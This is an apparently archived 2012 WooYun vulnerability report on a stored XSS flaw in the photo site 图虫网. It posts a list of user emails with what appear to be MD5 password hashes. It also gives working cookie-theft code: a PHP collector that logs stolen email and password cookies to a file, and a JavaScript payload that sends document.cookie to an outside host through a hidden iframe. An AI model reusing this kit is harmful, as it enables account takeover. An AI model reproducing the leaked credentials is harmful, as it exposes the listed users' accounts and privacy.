当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011372

漏洞标题:图虫网帐户密码泄露高危啊。

相关厂商:图虫网

漏洞作者: _Evil

提交时间:2012-08-26 16:00

修复时间:2012-08-31 16:00

公开时间:2012-08-31 16:00

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-26: 细节已通知厂商并且等待厂商处理中
2012-08-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实我很想搞ajax继续传播,1传10,10传100的。 没有授权不敢。

剑心:漏洞要用数据说话的。

详细说明:

http://yf-吗晒客.com/uploads/sb.txt

email:[email protected]:88e519826c6e7f64ed83dd5f222cbf5b
email:[email protected]:0794fdd7a3f98153a04bfbd6b3ed2e4f
email:[email protected]:
email:[email protected]:0794fdd7a3f98153a04bfbd6b3ed2e4f
email:[email protected]:8983683b49b1e5117fa3775bd4ea8e71
email:-password:
email:[email protected]:538344bd3ab84ecf3b2a8257f4bfb69b
email:[email protected]:b56f2eaa47d7bafdd427fd833831564e
email:[email protected]:a1a4419eff3ca6dc2d3fa227d79f7382
email:[email protected]:59dbc0fa881406b3ab85826ba15712fe
email:[email protected]:3821744b73566f2419fba2643d07a495
email:[email protected]:4cdae08ec4b134593960e3bac693fc26
email:[email protected]:e35f328b65afdf9c255216d37f2ec4ca
email:[email protected]:7531b9818a9085dd5aa269569a955d90
email:[email protected]:1e077f0bf453bb351ccd20211c1f1c50
email:[email protected]:08e55e7ddd48424cfba1c0f07cb0a5d9
email:[email protected]:1b30b7acdf6e5bf7ccb1a73e4a48839e
email:[email protected]:f24fcf42969d71912f79bc7ff3ed8051
email:[email protected]:4d7032fd1c3ee3d7054807a366d5c5ec
email:[email protected]:a1b69e9ee73f511993cf3f2bd4043080
email:[email protected]:ac115e77aedf3c2770aca540dbc4f842
email:[email protected]:09b22190be57d5de15a18a494034e91a
email:[email protected]:9b1b83839625e011575b6728c1db7053
email:[email protected]:dd812a2d1b9e7bbc6fdaed46e64daa53
email:[email protected]:c9145ec4c54a81d9e3279a13b27bf7ed
email:[email protected]:331c2679989ba11f2357a960bdc8601e
email:[email protected]:807c21c0b99b29c6de4f29c255906ee2
email:[email protected]:8016a3012286645575ebe3a361a63459
email:[email protected]:
email:[email protected]:dadf5c1b59ef532717f2b14c614fe727
email:[email protected]:9bc3122074b40d9d9470ff893fdd4cc1
email:[email protected]:2cf4efdd0eb20af9149cd2e65eeb06f7
email:[email protected]:
email:[email protected]:2b479a243e91a3b070d2a5e4369cad13
email:[email protected]:258a4fa98d83e4776a5a0eca80312970
email:[email protected]:23205959aa168add4bd1dc8616d470dd
email:[email protected]:1cfc8d22758737274d15c8ab4b5c5f9c
email:[email protected]:df0dbd3845c3bc79f1a979a9fa9dc426
email:[email protected]:4c1070c7bdd8edc15f6b27d691b2a98b
email:[email protected]:7d8b2544edf58c5aea5d45fbc6a6d59a
email:[email protected]:0ee5c42feab7c0f8295d393c49506582
email:[email protected]:0f4137ed1502b5045d6083aa258b5c42
email:[email protected]:c19ac054c8a5c4e548e36383bd0b2ec7
email:[email protected]:5585a302921b70059a618ad06c365da3
email:[email protected]:b0567a2055f3bccc97a4ea3f27bce51b
email:[email protected]:dc4451d61415c741db8570c378ee2b1d
email:[email protected]:32c501c605a01b2b6b84cbe6dbcb7e64
email:[email protected]:6e528ea73c3efb6a4bdd836fd017b427
email:[email protected]:064f08d4a4ab5f9025698803ebd98954
email:[email protected]:da95860a9dde291249a0a02b90255962
email:[email protected]:32186824cc871688d94a0f69f1fff996
email:[email protected]:0bb507d15ef53588d995f10011a8163b
email:[email protected]:2eaea49f993994eee87171bdafce87be
email:[email protected]:82ee378cb20fe94bcff7d01df363b216
email:[email protected]:b7569e7388e663a1512050218c66d08a
email:[email protected]:ee606053902dd7741d5bd46f7de2b53d
email:[email protected]:fbbdc876f33d97146ceda5af1d31772a
email:[email protected]:945609558c8a3995bf2030d30e2f310e
email:[email protected]:8b471d2c07b2537791d6234d64ddee2b
email:[email protected]:db88ae12e02d23c4e2f484aee768748c
email:[email protected]:32546b751eb75ce027f0197f695e2f98
email:[email protected]:b9bf338cfff10644a7708c8ce1d9ed12
email:[email protected]:868ab18969d3f8b59c8671777f93730f
email:[email protected]:ac886f6f68837c4f909e56c412388285
email:[email protected]:4404e8a76f6835e97d6db0fedd103482
email:[email protected]:58963df817d4f28741b3c558f377b67d
email:[email protected]:28331f55541279ef8950c15d16c8bdcd
email:[email protected]:25d73c271c1dd95c54cfca9bfe3d9dfe
email:[email protected]:da08ee40511ad8854810365411e2269e
email:[email protected]:b17301d76ac092e7b32a3083f74585a4
email:[email protected]:08ca9c5d74bf28887cbe62ae4242479f
email:[email protected]:
email:[email protected]:92e803b2ae9581ee9a65a5bd08aac1b1
email:[email protected]:bbefeba062f816d0c68bb6b757f54f28
email:[email protected]:ba065b1e6e716746d83dd76392262ce4
email:[email protected]:be9072eec6d7b4030d24712403cb549f
email:[email protected]:78296ae4f312544e530eea6260b7983e
email:[email protected]:8fef3f36f2d0e69a01b670511aa3d4f4
email:[email protected]:2309275ac43161f935b00029743c753d
email:[email protected]:9643f71b3067a01dc7f3845719535482
email:[email protected]:1cd341f93d7147a4bda6d2eac899fe1d
email:[email protected]:8d94c6fa8db4ad63921820c6914bc66a
email:[email protected]:e24f4383920303ed47c71206d221085a
email:[email protected]:13cebba6d1bb0e3e70d289ff0fe4668a
email:[email protected]:0747976ce03d81883551da99c2346b8b
email:[email protected]:7e759aa4804fbf540b9d3a6f9cbad2b4
email:[email protected]:3c1b8a0137db234f18c9b6dd2a37ce5d
email:[email protected]:317204bbb3b70c97e61d9af7b471f28e
email:[email protected]:60557c6d0518db7fbba41a392b63d114
email:[email protected]:e7ee70e3c2f0986271eb5699693ac339
email:[email protected]:db5efa0d7f411deb0183ebaf4b1f7c14
email:[email protected]:e0584e5ca01caea7c47c077978f88ce2
email:[email protected]:e9086f624f5f1b754aaa11e6eff4c3b3
email:[email protected]:ddd42eea9f20e367ca6ab435fcada586
email:[email protected]:437134ebf5f68fadd04121ce5a984bc5
email:[email protected]:b78c98c650a008018e1503b38d6f3ff7
email:[email protected]:
email:[email protected]:6b3df585bc316bf93ad05421feed7fb7
email:[email protected]:6c7dfe6096c793bfe593ec66dcb4ffb6
email:[email protected]:929e565875f0ff0216b35b26b64e09f8
email:[email protected]:f3228715d5025ec342e95280e0f7248b
email:[email protected]:bbd11c7b6666e8b9fb638a69baad0672
email:[email protected]:da3e7686e6d2bd6916c20bb911f90b77
email:[email protected]:33814acc0b112f9c4a7d49a407321729
email:[email protected]:2a42591722571f604899f3c1cc657ca0
email:[email protected]:1d1208991fe6d3af56e59c8b6f58d466
email:[email protected]:06d2905af95979811ca987e3a7fdcb91
email:[email protected]:cddea3b3655d9a56838e09c89a1ec741
email:[email protected]:864752e55a1618c73fbea27df9221181
email:[email protected]:
email:[email protected]:22638a3131d0f0a7346b178fd29f939c


密码是md5解密就行了。

漏洞证明:

<html>
<head><title>90sec/title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
body{
background-image:url(http://forum.90sec.org/images/default/logo.gif);
background-attachment:fixed;
background-repeat:no-repeat;
background-color:#AFAFAF;
background-position:50% 50%;
}
</style>
</head>
<body>
</body>
</html>
<?php
$cookie = $_GET['c'];
get_pwd_and_email($cookie);
function get_pwd_and_email($cookie)
{	$get = array();
	if (!empty($cookie))
	{
		$cookie = strtr($cookie,"; ","&");
		parse_str($cookie,$get);
	    if(isset($get['email'])) $a=$get['email'];
	    if(isset($get['password']))  $b=$get['password'];
		$c="email:$a-password:$b";
		//echo "$c";
		$password_list=file('E:/vhost/wwwroot/vhost1329816067000/www/uploads/sb.txt');
		if(in_array("$c\r\n",$password_list))
		{break;}else{
		$fp=@fopen('E:/vhost/wwwroot/vhost1329816067000/www/uploads/sb.txt','a');
		@fwrite($fp,$c."\r\n");
		@fclose($fp);
		}
	}
}
?>


利用外部调用js:

<script/src=//xxxxx/1.js>


1.js代码

<iframe id="rc" width="0" height="0"></iframe><script>document.getElementById("rc").src="http://xxx/SBzhu1.php?c="+document.cookie;</script>


感谢 90sec核心 L.N帮忙优化php代码。测试没恶意,请不要介意。

修复方案:

http://www.wooyun.org/corps/%E5%9B%BE%E8%99%AB%E7%BD%91 去看看我发你的漏洞,认真修复
下。 哎。。。。。。

版权声明:转载请注明来源 _Evil@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-31 16:00

厂商回复:

最新状态:

2012-09-01:我之前没收到邮件阿.